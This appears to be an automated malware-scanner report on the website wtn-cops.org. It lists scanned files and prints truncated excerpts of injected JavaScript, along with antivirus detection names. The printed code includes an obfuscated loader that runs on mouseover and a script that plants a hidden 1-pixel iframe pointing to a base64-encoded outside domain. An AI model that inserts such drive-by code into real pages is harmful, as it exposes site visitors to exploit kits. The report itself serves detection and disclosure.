Malware Scanner report for wtn-cops.org

Malicious/Suspicious/Total urls checked: 10/0/15

10 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://wtn-cops.org/	200 OK Content-Length: 25781 Content-Type: text/html	clean
http://wtn-cops.org/css.js	200 OK Content-Length: 26006 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] ... 3249 bytes are skipped ...unter.get('aWZyYW1l'); break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports: AntiVir JS/iFrame.ER.1 Avast JS:Iframe-ER [Trj] nProtect JS:Trojan.JS.Redirector.X Emsisoft JS:Trojan.JS.Redirector.X (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.JS.Redirector.X McAfee JS/Exploit-Cool.d F-Secure JS:Trojan.JS.Redirector.X F-Prot JS/Agent.OQ.gen AVG Exploit_c.WPA Sophos Troj/JSRedir-DY GData JS:Trojan.JS.Redirector.X Commtouch JS/Agent.OQ.gen BitDefender JS:Trojan.JS.Redirector.X
http://wtn-cops.org/./sitemap/index.php	200 OK Content-Length: 9036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott ... 1043 bytes are skipped ...11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports: AntiVir JS/Redirector.QU.1 McAfee-GW-Edition JS/Exploit-Blacole.iq McAfee JS/Exploit-Blacole.iq NANO-Antivirus Trojan.Script.Iframe.zqwnd F-Prot JS/Crypted.J.gen Commtouch JS/Crypted.J.gen
http://wtn-cops.org/./sitemap/../index.php	200 OK Content-Length: 25781 Content-Type: text/html	clean
http://wtn-cops.org/./sitemap/../css.js	200 OK Content-Length: 26006 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] ... 3249 bytes are skipped ...unter.get('aWZyYW1l'); break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports: AntiVir JS/iFrame.ER.1 Avast JS:Iframe-ER [Trj] nProtect JS:Trojan.JS.Redirector.X Emsisoft JS:Trojan.JS.Redirector.X (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.JS.Redirector.X McAfee JS/Exploit-Cool.d F-Secure JS:Trojan.JS.Redirector.X F-Prot JS/Agent.OQ.gen AVG Exploit_c.WPA Sophos Troj/JSRedir-DY GData JS:Trojan.JS.Redirector.X Commtouch JS/Agent.OQ.gen BitDefender JS:Trojan.JS.Redirector.X
http://wtn-cops.org/./sitemap/.././sitemap/index.php	200 OK Content-Length: 9036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott ... 1043 bytes are skipped ...11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports: AntiVir JS/Redirector.QU.1 McAfee-GW-Edition JS/Exploit-Blacole.iq McAfee JS/Exploit-Blacole.iq NANO-Antivirus Trojan.Script.Iframe.zqwnd F-Prot JS/Crypted.J.gen Commtouch JS/Crypted.J.gen
http://wtn-cops.org/./sitemap/.././sitemap/../index.php	200 OK Content-Length: 25781 Content-Type: text/html	clean
http://wtn-cops.org/./sitemap/.././sitemap/../css.js	200 OK Content-Length: 26006 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] ... 3249 bytes are skipped ...unter.get('aWZyYW1l'); break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports: AntiVir JS/iFrame.ER.1 Avast JS:Iframe-ER [Trj] nProtect JS:Trojan.JS.Redirector.X Emsisoft JS:Trojan.JS.Redirector.X (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.JS.Redirector.X McAfee JS/Exploit-Cool.d F-Secure JS:Trojan.JS.Redirector.X F-Prot JS/Agent.OQ.gen AVG Exploit_c.WPA Sophos Troj/JSRedir-DY GData JS:Trojan.JS.Redirector.X Commtouch JS/Agent.OQ.gen BitDefender JS:Trojan.JS.Redirector.X
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/index.php	200 OK Content-Length: 9036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott ... 1043 bytes are skipped ...11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports: AntiVir JS/Redirector.QU.1 McAfee-GW-Edition JS/Exploit-Blacole.iq McAfee JS/Exploit-Blacole.iq NANO-Antivirus Trojan.Script.Iframe.zqwnd F-Prot JS/Crypted.J.gen Commtouch JS/Crypted.J.gen
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/../index.php	200 OK Content-Length: 25781 Content-Type: text/html	clean
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/../css.js	200 OK Content-Length: 26006 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] ... 3249 bytes are skipped ...unter.get('aWZyYW1l'); break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports: AntiVir JS/iFrame.ER.1 Avast JS:Iframe-ER [Trj] nProtect JS:Trojan.JS.Redirector.X Emsisoft JS:Trojan.JS.Redirector.X (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.JS.Redirector.X McAfee JS/Exploit-Cool.d F-Secure JS:Trojan.JS.Redirector.X F-Prot JS/Agent.OQ.gen AVG Exploit_c.WPA Sophos Troj/JSRedir-DY GData JS:Trojan.JS.Redirector.X Commtouch JS/Agent.OQ.gen BitDefender JS:Trojan.JS.Redirector.X
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/index.php	200 OK Content-Length: 9036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott ... 1043 bytes are skipped ...11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports: AntiVir JS/Redirector.QU.1 McAfee-GW-Edition JS/Exploit-Blacole.iq McAfee JS/Exploit-Blacole.iq NANO-Antivirus Trojan.Script.Iframe.zqwnd F-Prot JS/Crypted.J.gen Commtouch JS/Crypted.J.gen
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/../index.php	200 OK Content-Length: 25781 Content-Type: text/html	clean
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/../css.js	200 OK Content-Length: 26006 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] ... 3249 bytes are skipped ...unter.get('aWZyYW1l'); break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports: AntiVir JS/iFrame.ER.1 Avast JS:Iframe-ER [Trj] nProtect JS:Trojan.JS.Redirector.X Emsisoft JS:Trojan.JS.Redirector.X (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.JS.Redirector.X McAfee JS/Exploit-Cool.d F-Secure JS:Trojan.JS.Redirector.X F-Prot JS/Agent.OQ.gen AVG Exploit_c.WPA Sophos Troj/JSRedir-DY GData JS:Trojan.JS.Redirector.X Commtouch JS/Agent.OQ.gen BitDefender JS:Trojan.JS.Redirector.X
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/.././sitemap/index.php	200 OK Content-Length: 9036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott ... 1043 bytes are skipped ...11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports: AntiVir JS/Redirector.QU.1 McAfee-GW-Edition JS/Exploit-Blacole.iq McAfee JS/Exploit-Blacole.iq NANO-Antivirus Trojan.Script.Iframe.zqwnd F-Prot JS/Crypted.J.gen Commtouch JS/Crypted.J.gen

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wtn-cops.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 10:08:26 GMT
Server: Apache
Content-Type: text/html

Second query (visit from search engine):
GET / HTTP/1.1
Host: wtn-cops.org
Referer: http://www.google.com/search?q=wtn-cops.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wtn-cops.org

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://wtn-cops.org/

Result: wtn-cops.org is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for wtn-cops.org

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools